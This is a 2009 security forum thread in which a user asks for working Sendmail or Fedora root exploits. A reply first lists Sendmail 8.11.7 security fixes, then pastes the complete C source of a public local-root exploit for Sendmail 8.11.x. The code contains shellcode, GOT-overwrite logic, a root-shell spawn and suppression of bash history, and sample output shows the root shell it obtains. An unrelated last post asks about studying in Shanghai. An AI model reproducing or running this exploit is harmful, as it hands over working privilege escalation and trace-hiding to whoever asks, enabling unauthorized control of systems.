» Security Forum |
|
|
|
 |
27-05-2009, 01:48 PM
|
#1
|
|
Junior Member
Level up: 70%, 30 Points needed |
Join Date: Sep 2008
Posts: 13
Thanks: 0
Thanked 0 Times in 0 Posts
|
Looking for some information
Hey guys
Im looking for an remote exploit for sendmail ver. 8.11.6 working on Redhat 7.3 or local root exploit for fedora core 4.
If u know were to search or any good website, please send me info.
take care
|
|
|
|
27-05-2009, 01:57 PM
|
#2
|
|
Member
Level up: 21%, 119 Points needed |
Join Date: Jul 2008
Posts: 52
Thanks: 1
Thanked 0 Times in 0 Posts
|
Informations on Sendmail remote exploits
Hello h3xx,
the best way to know about exploits and security issues on Sendmail 8.11.6 is to check what has been fixed on Sendmail 8.11.7, but this doesn't mean that it is all, there are for sure other "holes" that have been fixed in the next Sendmail versions.
Here is what has been fixed from 8.11.6 to 8.11.7
Code:
8.11.7/8.11.7 2003/03/29
SECURITY: Fix a remote buffer overflow in header parsing by
dropping sender and recipient header comments if the
comments are too long. Problem noted by Mark Dowd
of ISS X-Force.
SECURITY: Fix a buffer overflow in address parsing due to
a char to int conversion problem which is potentially
remotely exploitable. Problem found by Michal Zalewski.
Note: an MTA that is not patched might be vulnerable to
data that it receives from untrusted sources, which
includes DNS.
To provide partial protection to internal, unpatched sendmail MTAs,
8.11.7 changes by default (char)0xff to (char)0x7f in
headers etc. To turn off this conversion compile with
-DALLOW_255 or use the command line option -d82.101.
To provide partial protection for internal, unpatched MTAs that may be
performing 7->8 or 8->7 bit MIME conversions, the default
for MaxMimeHeaderLength has been changed to 2048/1024.
Note: this does have a performance impact, and it only
protects against frontal attacks from the outside.
To disable the checks and return to pre-8.11.7 defaults,
set MaxMimeHeaderLength to 0/0.
Properly clean up macros to avoid persistence of session data
across various connections. This could cause session
oriented restrictions, e.g., STARTTLS requirements,
to erroneously allow a connection. Problem noted
by Tim Maletic of Priority Health.
Ignore comments in NIS host records when trying to find the
canonical name for a host.
Fix a memory leak when closing Hesiod maps.
Set ${msg_size} macro when reading a message from the command line
or the queue.
Prevent a segmentation fault when clearing the event list by
turning off alarms before checking if event list is
empty. Problem noted by Allan E Johannesen of Worcester
Polytechnic Institute.
Fix a potential core dump problem if the environment variable
NAME is set. Problem noted by Beth A. Chaney of
Purdue University.
Prevent a race condition on child cleanup for delivery to files.
Problem noted by Fletcher Mattox of the University of
Texas.
CONFIG: Do not bounce mail if FEATURE(`ldap_routing')'s bounce
parameter is set and the LDAP lookup returns a temporary
error.
CONFIG: Fix a syntax error in the try_tls ruleset if
FEATURE(`access_db') is not enabled.
LIBSMDB: Fix a lock race condition that affects makemap, praliases,
and vacation.
LIBSMDB: Avoid a file creation race condition for Berkeley DB 1.X
and NDBM on systems with the O_EXLOCK open(2) flag.
MAKEMAP: Avoid going beyond the end of an input line if it does
not contain a value for a key. Based on patch from
Mark Bixby from Hewlett-Packard.
MAIL.LOCAL: Fix a truncation race condition if the close() on
the mailbox fails. Problem noted by Tomoko Fukuzawa of
Sun Microsystems.
SMRSH: SECURITY: Only allow regular files or symbolic links to be
used for a command. Problem noted by David Endler of
iDEFENSE, Inc.
from http://www.sendmail.org/documentation/releaseNotes
Here you can see what are the Systems affected from the buffer overflow in address parsing, which is potentially remotely exploitable.
Also the following link can help you: http://ftp.cerias.purdue.edu/pub/adv...rescan.Bug.txt
If you find some other informations, please let me know... it can be for help for somebody else
Last edited by utnalove; 27-05-2009 at 02:00 PM.
|
|
|
|
|
27-05-2009, 02:08 PM
|
#3
|
|
Junior Member
Level up: 70%, 30 Points needed |
Join Date: Sep 2008
Posts: 13
Thanks: 0
Thanked 0 Times in 0 Posts
|
yea .. but...
I'm looking for a working exploit's  not fixes, because i want to use it (for a testing purposes of course).
Can be also code to compile it (even with some common errors)
But thx for trying.
ciao
|
|
|
|
|
27-05-2009, 02:27 PM
|
#4
|
|
Member
Level up: 21%, 119 Points needed |
Join Date: Jul 2008
Posts: 52
Thanks: 1
Thanked 0 Times in 0 Posts
|
look at this...
from milw0rm.com, it should work for all sendmails 8.11.x
Code:
/*
sendmail 8.11.x exploit (i386-Linux) by sd@sf.cz (sd@ircnet)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This code exploits well-known local-root bug in sendmail 8.11.x,
8.12.x may be vulnerable too, but I didn't test it.
It gives instant root shell with +s sendmail 8.11.x, x < 6
We're using objdump, gdb & grep in order to obtain VECT, so make sure
that they're on $PATH, works with 80% accuracy on stripped binaries
on several distros without changing offsets (rh7.0, rh7.1, suse7.2,
slackware 8.0...)
Greetz:
mlg & smoke : diz is mostly for .ro ppl ;) killall sl3
sorcerer : stop da fuckin' asking me how to sploit sm, diz crap
is for lamers like you ;))))
devik : sm 0wns ;)
to #linux.cz, #hack ....
.... and to alot of other ppl, where i can't remeber theyr handles ;)
args:
-d specify depth of analysis (default=32) [bigger = more time]
-o change offset (default = -32000) [between 1000..-64000]
-v specify victim (default /usr/sbin/sendmail) [+s sm binary]
-t specify temp directory (default /tmp/.sxp)
[temporary files, should be mounted as nosuid]
An example (redhat 7.0 CZ):
-------------------------------------------------------------------------------
[sd@pikatchu sxp]$ gcc sx.c -o sx
[sd@localhost sxp]$ ./sx
...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[*] Victim = /usr/sbin/sendmail[*] Depth = 32[*] Offset = -16384[*] Temp = /tmp/.sxp[*] ESP = 0xbfffe708
[+] Created /tmp/.sxp
[+] Step 1. setuid() got = 0x080aa028[*] Step 2. Copying /usr/sbin/sendmail to /tmp/.sxp/sm...OK[*] Step 3. Disassembling /tmp/.sxp/sm...OK, found 3 targets[*] Step 4. Exploiting 3 targets:
[1] (33% of targets) GOT=0x080aa028, VECT=0x00000064, offset=-16384
[2] (66% of targets) GOT=0x080aa028, VECT=0x080c6260, offset=-16384
Voila babe, entering rootshell!
Enjoy!
uid=0(root) gid=0(root) groups=0(root)
[root@pikatchu /]# whoami
root
[root@pikatchu /]# exit
exit
Thanx for choosing sd's products ;)
[sd@pikatchu sxp]$
--------------------------------------------------------------------------------
Enjoy! And don't abuse it too much :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <string.h>
#define SM "/usr/sbin/sendmail"
#define OBJDUMP "objdump"
#define GDB "gdb"
#define GREP "grep"
#define OURDIR "/tmp/.sxp"
/* an basic regexp to get interesting stuff from disassembled output
change it as you like if something doesn't work */
#define DLINE "%s -d %s 2> /dev/null | %s -B %d \"mov.*%%.l,(%%e..,%%e..,1)\" | %s \".mov .*0x80.*,%%e..\""
#define DLINEA OBJDUMP, vict, GREP, depth, GREP
#define BRUTE_DLINE "%s -d %s 2> /dev/null | %s \".mov .*0x80.*,%%e..\""
#define BRUTE_DLINEA OBJDUMP, vict, GREP
#define NOPLEN 32768
#define uchar unsigned char
#define NOP 0x90
/* 19 bytes ;), shell must be appended */
char shellcode[] =
"\xeb\x0c\x5b\x31\xc0\x50\x89\xe1"
"\x89\xe2\xb0\x0b\xcd\x80\xe8\xef"
"\xff\xff\xff";
char scode[512];
char dvict[] = SM;
struct target {
uint off;
uint brk;
uint vect;
};
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
char ourdir[256] = OURDIR;
/* cleanup */
void giveup(int i)
{
char buf[256];
sprintf(buf, "/bin/rm -rf %s > /dev/null 2> /dev/null", ourdir);
system(buf);
if (i >= 0) exit(i);
}
/* main sploit, stolen mostly from alsou.c ;) */
void sploit(char *victim, uint got, uint vect, uint ret)
{
uchar egg[sizeof(scode) + NOPLEN + 5];
char s[512] = "-d";
char *argv[3];
char *envp[2];
uint first, last, i;
strcpy(egg, "EGG=");
memset(egg + 4, NOP, NOPLEN);
strcpy(egg + 4 + NOPLEN, scode);
last = first = -vect - (0xffffffff - got + 1);
while (ret) {
char tmp[256];
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = 0;
argv[0] = victim;
argv[1] = s;
argv[2] = NULL;
envp[0] = egg;
envp[1] = NULL;
execve(victim, argv, envp);
}
int use(char *s)
{
printf("%s [command] [options]\n"
"-h this help\n"
"-d specify depth of analysis (default=32)\n"
"-o change offset (default = -32000)\n"
"-v specify victim (default /usr/sbin/sendmail)\n"
"-t specify temp directory (default /tmp/.sxp)\n"
"-b enables bruteforce (WARNING: this may take about 20-30 minutes!)\n", s);
return 1;
}
/* exploited flag */
int exploited = 0;
/* child root-shell will send us SIGUSR if everything is ok */
void sigusr(int i)
{
exploited++;
giveup(-1);
}
int main(int argc, char *argv[])
{
char victim[256] = SM;
char vict[256];
char gscr[256];
char path[256];
char d[256];
struct stat st;
FILE *f;
char buf[256];
int got;
struct target t[1024];
uint off, ep, l;
int i,j;
int offset = -16384;
int esp;
int depth = 32;
int brute = 0;
/* rootshell (if argv[0] == NULL) */
if (!*argv) {
/* open stdin and stdout */
dup2(2, 0);
dup2(2, 1);
setuid(0); /* regain root privs */
setgid(0);
/* send signal to parent that exploit is done */
kill(getppid(), SIGUSR1);
/* l-a-m-e ;) */
printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
chdir("/");
system("/usr/bin/id");
setenv("BASH_HISTORY", "/dev/null", 1);
execl("/bin/bash", "-bash", NULL);
}
printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...\n"
" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");
while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
switch (i) {
case 'd':
if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
return use(argv[0]);
break;
case 'o':
if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
return use(argv[0]);
break;
case 'v':
if (!optarg) return use(argv[0]);
strcpy(victim, optarg);
break;
case 't':
if (!optarg) return use(argv[0]);
strcpy(ourdir, optarg);
break;
case 'b':
brute++;
break;
case 'h':
default:
return use(argv[0]);
}
}
if (brute) printf("[*] Using brute force, this may take some time\n");
/* create full path to rootshell, cause
sendmail will change it's cwd */
path[0] = 0;
if (argv[0][0] != '/') {
getcwd(path, 256);
}
/* construct shellcode */
sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);
/* get stack frame */
esp = get_esp();
close(0);
signal(SIGUSR1, sigusr);
/* remove old stuff */
giveup(-1);
printf( "[*] Victim = %s\n"
"[*] Depth = %d\n"
"[*] Offset = %d\n"
"[*] Temp = %s\n"
"[*] ESP = 0x%08x\n",
victim,
depth,
offset,
ourdir,
esp);
stat(victim, &st);
if ((st.st_mode & S_ISUID) == 0) {
printf("[-] Bad: %s isn't suid ;(\n", victim);
}
if (access(victim, R_OK + X_OK + F_OK) < 0) {
printf("[-] Bad: We haven't access to %s !\n", victim);
}
if (mkdir(ourdir, 0777) < 0) {
perror("[-] Can't create our tempdir!\n");
giveup(1);
}
printf("[+] Created %s\n", ourdir);
sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
f = popen(buf, "r");
if (fscanf(f, "%x", &got) != 1) {
pclose(f);
printf("[-] Cannot get setuid() GOT\n");
giveup(1);
}
/* get GOT */
pclose(f);
printf("[+] Step 1. setuid() got = 0x%08x\n", got);
sprintf(vict, "%s/sm", ourdir);
printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
sprintf(buf, "/bin/cp -f %s %s", victim, vict);
system(buf);
if (access(vict, R_OK + X_OK + F_OK) < 0) {
perror("Failed");
giveup(1);
}
printf("OK\n");
/* disassemble & find targets*/
printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
if (!brute) {
sprintf(buf, DLINE, DLINEA);
} else {
sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
}
f = popen(buf, "r");
i = 0;
while (fgets(buf, 256, f)) {
int k, dontadd = 0;
if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
&ep, d, d, d, d, d, d, &off, d) == 9) {
/* same value ? */
for (k=0; k < i; k++) {
if (t[k].off == off) dontadd++;
}
/* new value ? */
if (!dontadd) {
/* add it to table */
t[i].off = off;
t[i++].brk = ep;
}
}
}
pclose(f);
printf("OK, found %d targets\n", i);
/* gdb every target and look for theyr VECT */
printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
sprintf(gscr, "%s/gdb", ourdir);
off = 0;
for (j=0; j < i; j++) {
/* create gdb script */
f = fopen(gscr, "w+");
if (!f) {
printf("Cannot create gdb script\n");
giveup(1);
}
fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
fclose(f);
sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
f = popen(buf, "r");
if (!f) {
printf("Failed to spawn gdb!\n");
giveup(1);
}
/* scan gdb's output */
while (1) {
char buf[256];
char *p;
t[j].vect = 0;
p = fgets(buf, 256, f);
if (!p) break;
if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
t[j].vect = l;
off++;
break;
}
}
pclose(f);
if (t[j].vect) {
int pid;
printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset);
fflush(stdout);
pid = fork();
if (pid == 0) {
close(1);
sploit(victim, got, t[j].vect, esp + offset);
}
/* wait until sendmail finishes (expoit failed)
or until SIGUSR arrives */
wait(NULL);
/* exploited ?? */
if (exploited) {
wait(NULL); /* kill zombie */
printf("Thanx for choosing sd's products ;)\n");
exit(0);
}
}
}
printf("[-] All targets failed, probably not vulnerable ;(\n");
giveup(1);
}
/* That's all. */
// milw0rm.com [2001-01-01]
Is that what you were looking for?
Last edited by utnalove; 27-05-2009 at 02:30 PM.
|
|
|
|
|
27-05-2009, 02:42 PM
|
#5
|
|
Junior Member
Level up: 70%, 30 Points needed |
Join Date: Sep 2008
Posts: 13
Thanks: 0
Thanked 0 Times in 0 Posts
|
|
|
|
|
|
27-05-2009, 02:46 PM
|
#6
|
|
Member
Level up: 21%, 119 Points needed |
Join Date: Jul 2008
Posts: 52
Thanks: 1
Thanked 0 Times in 0 Posts
|
let us know..
hasta la vista 
|
|
|
|
|
19-11-2009, 05:38 PM
|
#7
|
|
Junior Member
Level up: 16%, 42 Points needed |
Join Date: Nov 2009
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
|
Looking for some information
Hello Chi West
I have been browsing around your website, and well done on the new layout, it is much more functional than the older one.
I did a search for Masters Degree programmes in Shanghai taught in English as I am not sure I would be able to learn Chinese well enough to study in the language by the time I would like to begin in 2010.
I came across Fudan University in Shanghai who offers courses in Computer Applied Sciences and Computer Application Theory, the two subjects that I would most likely want to study.
Are there any formal way of contacting the university itself as their English Websites usually offer very little contact information, and when they do, a reply is usually not given.
I would like to know more about the individual universities, what they can offer in terms of accommodations and so on, that is the reason for me asking.
Best Regards
Mr. Mikkel Stig Larsen
|
|
|
|
|
| Thread Tools |
|
|
| Display Modes |
 Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
|
|
» Stats |
Members: 5,563
Threads: 116
Posts: 509
Top Poster: pikus (125)
|
| Welcome to our newest member, walkuz |
|
